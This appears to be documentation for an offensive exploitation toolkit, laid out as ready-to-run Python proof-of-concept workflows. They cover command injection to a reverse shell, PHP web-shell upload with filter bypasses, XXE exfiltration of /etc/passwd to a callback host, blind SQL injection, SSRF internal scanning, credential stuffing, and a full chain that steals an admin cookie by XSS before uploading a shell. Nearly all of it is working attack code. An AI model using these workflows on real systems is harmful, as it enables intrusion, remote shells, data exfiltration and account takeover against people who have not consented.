Workflows
End-to-end POC workflows for common exploitation scenarios.
RCE to Interactive Shell
From command injection to full PTY shell.
Exploit Code:
# src/your_project/exploit.py
import requests
from your_project.utils.output import out
from your_project.utils.reverse_shells import python_oneliner, bash_shell
from your_project.utils.shell_catcher import auto_shell
def run(args):
"""Exploit RCE and get interactive shell"""
target = args.target
lhost = args.lhost
lport = args.lport
# Generate shell payload
cmd = python_oneliner(lhost, lport)
out.info(f"Payload: {cmd}")
# Catch shell automatically
with auto_shell(lport) as catcher:
# Trigger RCE
out.status("Triggering RCE...")
r = requests.post(
f"{target}/api/run",
json={"command": cmd},
timeout=5
)
# Wait for shell
out.status(f"Waiting for shell on port {lport}...")
# Automatically upgrades to PTY and gives interactive shell
if catcher.shell_caught:
out.success("Shell caught!")
catcher.stabilize() # Upgrade to PTY
out.info("Shell stabilized. Entering interactive mode...")
catcher.interact() # Full interactive shell!
else:
out.error("No shell received")
Run:
uv run your_project --target http://target.local --lhost 10.10.14.5 --lport 4444
File Upload to RCE
Upload malicious file and get shell.
Exploit Code:
# src/your_project/exploit.py
import requests
from your_project.utils.output import out
from your_project.utils.file_upload import FileUploader
from your_project.utils.reverse_shells import php_shell
from your_project.utils.shell_catcher import quick_catch
def run(args):
"""Upload PHP shell and execute it"""
target = args.target
lhost = args.lhost
lport = args.lport
# Generate PHP reverse shell
shell_path = php_shell(lhost, lport)
out.info(f"Generated shell at: {shell_path}")
# Read shell content
with open(f'payloads/{shell_path}', 'rb') as f:
shell_code = f.read()
# Upload with bypass techniques
out.status("Uploading shell...")
uploader = FileUploader(f"{target}/upload")
result = uploader.upload_with_bypass(
"shell.php",
shell_code,
techniques=["double_extension", "null_byte"]
)
if result.status_code != 200:
out.error("Upload failed")
return
out.success("Shell uploaded!")
# Trigger execution and catch shell
def trigger():
out.status("Triggering shell execution...")
requests.get(f"{target}/uploads/shell.php", timeout=2)
quick_catch(lport, trigger_func=trigger)
Run:
uv run your_project --target http://target.local --lhost 10.10.14.5 --lport 4444
XXE Data Exfiltration
Read files via XXE.
Setup:
Start the HTTP callback server first:
uv run your_project --server
Exploit Code:
# src/your_project/exploit.py
import requests
from your_project.utils.output import out
from your_project.utils.xxe import quick_test
from your_project.utils.server_hooks import get_exfil
def run(args):
"""Exfiltrate /etc/passwd via XXE"""
target = args.target
lhost = args.lhost
lport = args.lport
# Generate XXE payload (also creates DTD file)
payload = quick_test(f"http://{lhost}:{lport}", "/etc/passwd")
out.info("XXE payload generated")
# Send XXE payload
out.status("Sending XXE payload...")
r = requests.post(
f"{target}/api/parse",
data=payload,
headers={"Content-Type": "application/xml"}
)
# Wait for exfil callback
out.status("Waiting for data exfiltration...")
data = get_exfil(timeout=30)
if data:
out.success("Data exfiltrated!")
out.raw("\\n" + "="*50)
out.raw(data)
out.raw("="*50 + "\\n")
return data
else:
out.error("No data received")
return None
Run:
uv run your_project --target http://target.local --lhost 10.10.14.5
Blind SQL Injection
Extract data from blind SQLi.
Exploit Code:
# src/your_project/exploit.py
import requests
import string
from your_project.utils.output import out
from your_project.utils.timing import time_request
def run(args):
"""Extract database name via boolean-based blind SQLi"""
target = args.target
def check_condition(condition):
"""Returns True if condition is true"""
r = requests.get(
f"{target}/api/user",
params={"id": f"1' AND {condition}--"}
)
return "Welcome" in r.text
# Extract database name
db_name = ""
charset = string.ascii_lowercase + string.digits + "_"
out.info("Extracting database name...")
for pos in range(1, 33):
found = False
for char in charset:
condition = f"SUBSTRING(DATABASE(),{pos},1)='{char}'"
if check_condition(condition):
db_name += char
out.status(f"Database: {db_name}")
found = True
break
if not found:
break
out.success(f"Database name: {db_name}")
return db_name
def run_time_based(args):
"""Extract data via time-based blind SQLi"""
target = args.target
def check_char(pos, char):
"""Returns True if char at position matches"""
payload = f"1' AND IF(SUBSTRING(DATABASE(),{pos},1)='{char}',SLEEP(3),0)--"
def attempt():
return requests.get(f"{target}/api/user", params={"id": payload}, timeout=10)
duration = time_request(attempt, payload)
return duration > 3
db_name = ""
charset = string.ascii_lowercase + string.digits + "_"
out.info("Extracting database name (time-based)...")
for pos in range(1, 33):
found = False
for char in charset:
if check_char(pos, char):
db_name += char
out.status(f"Database: {db_name}")
found = True
break
if not found:
break
out.success(f"Database name: {db_name}")
return db_name
Run:
# Boolean-based
uv run your_project --target http://target.local
# Time-based (if boolean-based doesn't work)
uv run your_project --target http://target.local --time-based
SSRF to Internal Access
Exploit SSRF to access internal services.
Exploit Code:
# src/your_project/exploit.py
import requests
from your_project.utils.output import out
from your_project.utils.batch_request import batch_request_sync, generate_param_payloads
import httpx
def run(args):
"""Use SSRF to scan internal network"""
target = args.target
# Test SSRF vulnerability
out.info("Testing SSRF...")
test_url = "http://127.0.0.1:80"
r = requests.get(f"{target}/fetch", params={"url": test_url})
if r.status_code == 200:
out.success("SSRF confirmed!")
else:
out.error("SSRF test failed")
return
# Scan internal ports
out.status("Scanning internal ports...")
client = httpx.Client()
base = client.build_request("GET", f"{target}/fetch")
# Common internal service ports
ports = [22, 80, 443, 3306, 5432, 6379, 8080, 9200]
internal_urls = [f"http://127.0.0.1:{port}" for port in ports]
results = batch_request_sync(
base,
payloads=generate_param_payloads("url", internal_urls),
validate=lambda r: r.status_code == 200 and len(r.text) > 100,
concurrency=5
)
# Show open ports
out.info("\\nOpen internal ports:")
for result in results:
if result.matched:
port = result.payload['params']['url'].split(':')[-1]
out.success(f"Port {port} is open")
# Try to access internal admin panel
out.status("\\nTrying internal admin panel...")
r = requests.get(
f"{target}/fetch",
params={"url": "http://127.0.0.1:8080/admin"}
)
if "admin" in r.text.lower():
out.success("Accessed internal admin panel!")
out.raw(r.text[:500])
Run:
uv run your_project --target http://target.local
Credential Stuffing
Test multiple credentials efficiently.
Exploit Code:
# src/your_project/exploit.py
import httpx
from your_project.utils.output import out
from your_project.utils.batch_request import batch_request_sync, generate_json_payloads
def run(args):
"""Test common credential pairs"""
target = args.target
# Common credentials
creds = [
{"username": "admin", "password": "admin"},
{"username": "admin", "password": "password"},
{"username": "admin", "password": "admin123"},
{"username": "root", "password": "root"},
{"username": "administrator", "password": "administrator"},
{"username": "test", "password": "test"},
]
out.info(f"Testing {len(creds)} credential pairs...")
client = httpx.Client()
base = client.build_request(
"POST",
f"{target}/api/login",
json={"username": "", "password": ""}
)
# Test all credentials
results = batch_request_sync(
base,
payloads=[{"json": cred} for cred in creds],
validate=lambda r: r.status_code == 200 and "token" in r.text,
concurrency=3 # Be gentle with login endpoints
)
# Show valid credentials
for result in results:
if result.matched:
creds = result.payload['json']
out.success(f"Valid creds: {creds['username']}:{creds['password']}")
Run:
uv run your_project --target http://target.local
Complete Exploitation Workflow
Full exploitation chain.
Setup:
Start the HTTP callback server first:
uv run your_project --server
Exploit Code:
# src/your_project/exploit.py
import requests
from your_project.utils.output import out
from your_project.utils.html_parser import HTMLParser
from your_project.utils.xss import cookie_stealer
from your_project.utils.server_hooks import get_cookie
from your_project.utils.cookie import parse_cookie_string
from your_project.utils.file_upload import FileUploader
from your_project.utils.reverse_shells import php_shell
from your_project.utils.shell_catcher import auto_shell
def run(args):
"""Complete exploitation chain"""
target = args.target
lhost = args.lhost
lport = args.lport
# Stage 1: Reconnaissance
out.info("Stage 1: Reconnaissance")
r = requests.get(target)
parser = HTMLParser.from_response(r)
# Find forms
forms = parser.find_forms()
out.success(f"Found {len(forms)} forms")
# Find upload endpoint
upload_form = None
for form in forms:
if 'upload' in form.get('action', '').lower():
upload_form = form
break
if not upload_form:
out.error("No upload form found")
return
# Stage 2: XSS to steal admin cookie
out.info("\\nStage 2: XSS Cookie Theft")
payload = cookie_stealer(f"http://{lhost}:{lport}")
requests.post(f"{target}/comment", data={"msg": payload})
out.status("Waiting for admin...")
cookie_str = get_cookie(timeout=60)
if not cookie_str:
out.error("No cookie received")
return
out.success("Cookie captured!")
cookies = parse_cookie_string(cookie_str)
# Stage 3: File upload with stolen session
out.info("\\nStage 3: File Upload")
shell_path = php_shell(lhost, 4444)
with open(f'payloads/{shell_path}', 'rb') as f:
shell_code = f.read()
uploader = FileUploader(f"{target}/upload")
result = uploader.upload(
"shell.php",
shell_code,
cookies=cookies
)
if result.status_code != 200:
out.error("Upload failed")
return
out.success("Shell uploaded!")
# Stage 4: Get interactive shell
out.info("\\nStage 4: Shell Execution")
with auto_shell(4444) as catcher:
requests.get(f"{target}/uploads/shell.php", timeout=2)
if catcher.shell_caught:
out.success("Root access achieved!")
catcher.stabilize()
catcher.interact()
Run:
uv run your_project --target http://target.local --lhost 10.10.14.5